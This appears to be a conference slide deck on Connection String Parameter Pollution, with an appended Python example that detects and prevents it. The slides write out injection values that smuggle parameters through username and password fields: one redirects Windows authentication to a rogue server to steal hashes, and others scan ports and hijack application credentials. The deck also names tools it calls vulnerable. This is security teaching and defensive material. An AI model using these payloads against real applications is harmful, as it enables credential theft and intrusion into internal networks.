Chema Alonso
Informática 64

Connection Strings
• Define the way an application connects to a data repository
• There are connection strings for:
– Relational Databases (MSSQL, Oracle, MySQL, …)
– LDAP Directories
– Files
– Etc.

Database Connection Strings
Data Source = myServerAddress;
Initial Catalog = myDataBase;
User Id = myUsername;
Password = myPassword;

Google Hacking

UDL (Universal Data Links) Files

Credentials
Operating System Accounts:
Data Source = myServerAddress;
Initial Catalog = myDataBase;
User Id = myUsername;
Password = myPassword;
Integrated Security = SSPI/True/Yes;

Database Credentials:
Data Source = myServerAddress;
Initial Catalog = myDataBase;
User Id = myUsername;
Password = myPassword;
Integrated Security = No;

Users authenticated by Web App
Web application manages the login process
1.- The web application connects to the database using the credentials in its connection string (Syslogins).
2.- Asks the user for login information.
3.- Checks the login information against the info stored in a custom users table (Select id from users).
(Diagram: Database Engine; App running on Web Server)

Users authenticated by Database
Database engine manages the login process
1.- The web application asks the user for credentials.
2.- A connection string is composed with those credentials to connect to the database (Syslogins).
3.- Roles and permissions are limited to those of the user used in the connection string.
(Diagram: Database Engine; App running on Web Server)

Connection String Attacks
• It's possible to inject parameters into connection strings using semicolons as separators

Data Source = myServerAddress;
Initial Catalog = myDataBase;
Integrated Security = NO;
User Id = myUsername;
Password = myPassword; Encryption = Off;

ConnectionStringBuilder
• Available in .NET Framework 2.0
• Builds secure connection strings from parameters
• It's not possible to inject into the connection string
Are people aware of this?

Connection String Parameter Pollution
• The goal is to inject parameters into the connection string, whether they already exist in it or not
• If a parameter is duplicated, the last value wins
• This behavior allows attackers to completely rewrite the connection string, and therefore to manipulate the way the application will work and how it will be authenticated

Pollutionable Behavior
Param1=Value A; Param2=Value B; Param1=Value C; Param2=Value D

DBConnection Object (last value wins):
Param1 = Value C
Param2 = Value D

What can be done with CSPP? Rewrite a parameter
Data Source=DB1; UID=sa; password=Pwnd!; Data Source=DB2

DBConnection Object:
Data Source = DB2
UID = sa
password = Pwnd!

Scanning the DMZ
(Diagram: Internet -> FW -> Web app vulnerable to CSPP -> Production Database. The web app's Data Source normally points to the Production Database; the Development, Financial, Test and Forgotten databases sit in the same DMZ.)

Port Scanning a Server
(Diagram: Internet -> FW -> Web app vulnerable to CSPP -> Production Database. Data Source values sent to the server: DB1,80; DB1,21; DB1,25; DB1,1445.)

What can be done with CSPP? Add a parameter
Data Source=DB1; UID=sa; password=Pwnd!; Integrated Security=True

DBConnection Object:
Data Source = DB1
UID = sa
password = Pwnd!
Integrated Security = True (the added parameter)

CSPP Attack 1: Hash stealing
1.- Run a rogue server on an accessible IP address: Rogue_Server
2.- Activate a sniffer to catch the login process: Cain/Wireshark
3.- Duplicate the Data Source parameter: Data_Source=Rogue_Server
4.- Force Windows Integrated Authentication: Integrated Security=true

CSPP Attack 1: Hash stealing
Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id=+'User_Value'+; Password=+'Password_Value'+;

Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id=;Data Source=Rogue_Server; Password=;Integrated Security=True;

CSPP 1: ASP.NET Enterprise Manager

CSPP Attack 2: Port Scanning
1.- Duplicate the Data Source parameter, setting on it the target server and the target port to be scanned:
Data_Source=Target_Server,target_Port
2.- Check the error messages:
- No TCP Connection -> Port is opened
- No SQL Server -> Port is closed
- SQL Server -> Invalid Password

CSPP Attack 2: Port Scanning
Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id=+'User_Value'+; Password=+'Password_Value'+;

Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id=;Data Source=Target_Server,Target_Port; Password=;Integrated Security=True;

CSPP 2: myLittleAdmin: Port is Opened

CSPP 2: myLittleAdmin: Port is Closed

CSPP Attack 3: Hijacking Web Credentials
1.- Duplicate the Data Source parameter, pointing it to the target SQL Server: Data_Source=Target_Server
2.- Force Windows Authentication: Integrated Security=true
3.- The application pool in which the web app is running will send its credentials in order to log in to the database engine.

CSPP Attack 3: Hijacking Web Credentials
Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id=+'User_Value'+; Password=+'Password_Value'+;

Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id=;Data Source=Target_Server; Password=;Integrated Security=true;

CSPP Attack 3: Web Data Administrator

CSPP Attack 3: myLittleAdmin/myLittleBackup

CSPP Attack 3: ASP.NET Enterprise Manager

Other Databases
• MySQL
– Does not support Integrated Security
– It's still possible to manipulate the behavior of the web application:
• Port Scanning
• Connect to internal/testing/development databases
• Oracle supports integrated authentication running on Windows and UNIX/Linux servers
– It's possible to perform all the described attacks:
• Hash stealing
• Port Scanning
• Hijacking Web credentials
– It's also possible to elevate a connection to sysdba in order to shutdown/startup an instance

myLittleAdmin/myLittleBackup
myLittleTools released a security advisory and a patch about this.

ASP.NET Enterprise Manager
• ASP.NET Enterprise Manager is "abandoned", but it's been used in a lot of web Control Panels.
• Fix the code yourself

ASP.NET Web Data Administrator
ASP.NET Web Data Administrator is secure on the CodePlex web site, but not on the Microsoft web site, where an insecure old version is published.

Countermeasures
• Harden your firewall
– Outbound connections
• Harden your internal accounts
– Web application
– Web server
– Database Engine
• Use ConnectionStringBuilder
• Filter the ;)
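As an added example that is not part of the original slides, the Python below models the Pollutionable Behavior slide and the ConnectionStringBuilder countermeasure: it concatenates the Attack 3 input the slides show, parses the result with last-value-wins semantics, flags the duplicated keys a defender could alert on, and builds the same parameters with builder-style quoting so the injected text stays a single value. The parser and quoting rules are our own simplified model, not ADO.NET's code; Target_Server is the slides' placeholder name.

```python
from collections import Counter

# Constructed inputs modelled on the Attack 3 slide (Target_Server is the slide's
# placeholder name): user id left empty, extra parameters smuggled via the password.
POLLUTED_USER = ""
POLLUTED_PASSWORD = ";Data Source=Target_Server;Integrated Security=true"

def build_unsafe(user, password):
    """The vulnerable pattern from the slides: plain string concatenation."""
    return ("Data Source=SQL2005;Initial Catalog=db1;Integrated Security=no;"
            f"User Id={user};Password={password};")
def tokens(cs):
    """Yield (key, value) pairs; a double-quoted value may contain ';' and
    writes a literal quote as "" (our own parser, not ADO.NET's)."""
    i, n = 0, len(cs)
    while i < n:
        while i < n and cs[i] in "; \t":          # skip separators between pairs
            i += 1
        eq = cs.find("=", i)
        if i >= n or eq < 0:
            return
        key, i = cs[i:eq].strip().lower(), eq + 1
        if cs[i:i + 1] == '"':                    # quoted value
            i, val = i + 1, []
            while i < n and not (cs[i] == '"' and cs[i + 1:i + 2] != '"'):
                i += 2 if cs[i] == '"' else 1     # "" is one literal quote
                val.append(cs[i - 1])
            value, i = "".join(val), i + 1        # step past the closing quote
            end = cs.find(";", i)
        else:
            end = cs.find(";", i)
            value = cs[i:n if end < 0 else end].strip()
        i = n if end < 0 else end + 1
        yield key, value
def parse(cs):
    """dict() keeps the last value of a repeated key: 'last value wins'."""
    return dict(tokens(cs))
def duplicated_keys(cs):
    """Keys seen more than once: a cheap CSPP signal for a WAF rule or log review."""
    return sorted(k for k, c in Counter(k for k, _ in tokens(cs)).items() if c > 1)

def quote_value(value):
    """Quote like a builder does, so ';' or '=' inside a value cannot open a new parameter."""
    if value and value == value.strip() and not any(c in value for c in ';="\''):
        return value
    return '"' + value.replace('"', '""') + '"'

def build_safe(params):
    """Builder-style construction: every value goes through quote_value."""
    return ";".join(f"{k}={quote_value(v)}" for k, v in params.items()) + ";"
```

With the concatenated string, parse() resolves Data Source to Target_Server and Integrated Security to true, and duplicated_keys() reports both; with build_safe() the same input stays inside the Password value and no key is duplicated.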

Questions?

Contact
Chema Alonso
chema@informatica64.com
http://www.informatica64.com
http://elladodelmal.blogspot.com
Palako
palakko@lateatral.com

Authors
Chema Alonso 
Manuel Fernández “The Sur”
Alejandro Martín Bailón
Antonio Guzmán
